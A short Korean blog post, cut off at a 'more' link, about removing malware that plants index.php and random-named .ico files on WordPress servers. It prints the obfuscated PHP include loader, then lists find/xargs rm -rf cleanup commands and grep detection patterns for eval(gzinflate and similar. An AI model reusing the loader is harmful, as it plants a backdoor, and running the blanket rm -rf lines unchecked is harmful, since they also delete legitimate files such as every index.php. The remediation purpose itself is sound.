0211월/20

index.php, .2ec67e7e.ico 파일 생성 malware

www-data index.php 파일이나 .2ec67e7e.ico 이런 ico 파일들이 생성된 경우, wordpress plugin 등에서 유입된 멀웨어를 의심해야한다. 워드프레스가 설치된 서버에는 전체적으로 적용되는 사안이다. 귀찬.. 일단 원천봉쇄는 뒤로하고 파일들을 찾아서 제거하자. index.php 의 내용은 이렇다. <?php /*5693b*/ @include “\057ho\155e/.\144d5\0640e\0670.\151co”; /*5693b*/ unphp.net 에서 풀어보면.. ico파일 include하는 형태.. 만든놈 나가 죽었으면.. find -name index.php find -name index.php -exec rm -rf {} \; find -name “*.ico” | egrep ‘.[1-z]{8}.ico’ find -name “*.ico” | egrep ‘.[1-z]{8}.ico’ | xargs rm -rf find -name “*.php” | egrep ‘\.[1-z]{8}.php’ find -name “*.php” | egrep ‘\.[1-z]{8}.php’ | xargs rm -rf find . -type d -name ‘forum’ find . -type d -name ‘forum’ | xargs rm -rf find . -type d -name ‘journal’ find . -type d -name ‘journal’ | xargs rm -rf 이런것들 찾아서 제거해주면 되겠는데 php 파일들은 날리기전에 체크한번씩 해보고.. 엄한거 지우면 골치아프니까 find . -type f -name ‘*.php’ | xargs grep -l ” *=PHP_VERSION *” find . -type f -name ‘*.php’ | xargs grep -l ” *Phar::interceptFileFuncs() *” find . -type f -name ‘*.php’ | xargs grep -l ” *@include *” find . -type f -name ‘*.php’ | xargs grep -l ” *interceptFileFuncs *” find . -type f -name ‘*.php’ | xargs grep -l ” *eval *( *gzinflate *(더보기…